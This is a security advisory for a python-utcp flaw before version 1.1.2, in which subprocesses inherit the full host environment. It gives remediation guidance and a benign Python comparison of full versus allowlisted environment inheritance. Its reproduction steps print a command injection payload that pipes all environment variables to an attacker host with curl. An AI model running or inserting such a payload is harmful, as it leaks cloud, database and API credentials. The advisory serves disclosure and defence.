python-utcp Environment Variable Exposure Vulnerability Allowing Secrets Leakage
Vulnerability
A vulnerability in python-utcp versions prior to 1.1.2 allows exfiltration of process-level secrets through environment variable exposure. The function '_prepare_environment()' in 'cli_communication_protocol.py' passes a complete copy of 'os.environ' to every CLI subprocess. When exploited in conjunction with a command injection vulnerability, this can leak sensitive information such as cloud provider credentials, database connection strings, LLM API keys, and internal service tokens.
Impact
Exploitation of this vulnerability allows any environment variable from the host process to be accessed by injected commands in the CLI subprocess. This includes sensitive information like cloud provider credentials, database connection strings, LLM API keys, and internal service tokens.
Reproduction
To reproduce this vulnerability, use a version of python-utcp prior to 1.1.2. Define a tool that includes a command with a pattern matching 'UTCP_ARG_pattern_UTCP_END'. When the tool is executed, supply arguments that include a command injection payload, such as 'env | curl -s -d @- https://attacker.com'. The injected command will be executed in the subprocess, and a full dump of the environment variables, including secrets, will be sent to the attacker.
Remediation
Upgrade to python-utcp version 1.1.2 or later. In the patched version, the '_prepare_environment()' function no longer exposes the full host environment to subprocesses. Instead, environment variable inheritance is controlled by a new 'CliCallTemplate.inherit_env_vars' field, allowing for more precise management of which variables are passed to CLI tools.
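The difference between full inheritance and controlled inheritance, as an added example that is not python-utcp's own code: the helper names, the sample environment, and the assumption that inheritance is expressed as an allowlist of variable names are all constructed for illustration. It spawns a child interpreter under each environment and reports which non-allowlisted host variables the child can read.

```python
import json
import subprocess
import sys

# Constructed sample host environment; every value is a fake placeholder.
HOST_ENV = {
    "PATH": "/usr/bin:/bin",
    "LANG": "C.UTF-8",
    "AWS_SECRET_ACCESS_KEY": "constructed-fake-value",
    "DATABASE_URL": "postgres://constructed-fake-value",
    "OPENAI_API_KEY": "constructed-fake-value",
}
INHERIT = ["PATH", "LANG"]  # assumed allowlist of names the tool may inherit


def env_full_copy(host_env):
    """Pattern the advisory describes: the child receives every host variable."""
    return dict(host_env)


def env_allowlist(host_env, inherit, extra=None):
    """Start from an empty environment, copy only allowlisted names, add per-tool values."""
    env = {name: host_env[name] for name in inherit if name in host_env}
    env.update(extra or {})
    return env


def child_visible_names(env):
    """Spawn a child interpreter with `env` and return the variable names it can read."""
    code = "import json, os; print(json.dumps(sorted(os.environ)))"
    result = subprocess.run([sys.executable, "-c", code], env=env,
                            capture_output=True, text=True, check=True)
    return set(json.loads(result.stdout))


def leaked(env, host_env, inherit):
    """Host variables that reach the child although they are not allowlisted."""
    return sorted((child_visible_names(env) & set(host_env)) - set(inherit))


if __name__ == "__main__":
    print("full copy :", leaked(env_full_copy(HOST_ENV), HOST_ENV, INHERIT))
    print("allowlist :", leaked(env_allowlist(HOST_ENV, INHERIT), HOST_ENV, INHERIT))
```

Restricting the environment limits what a subprocess can read; it does not remove the command injection itself, which still needs its own fix.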
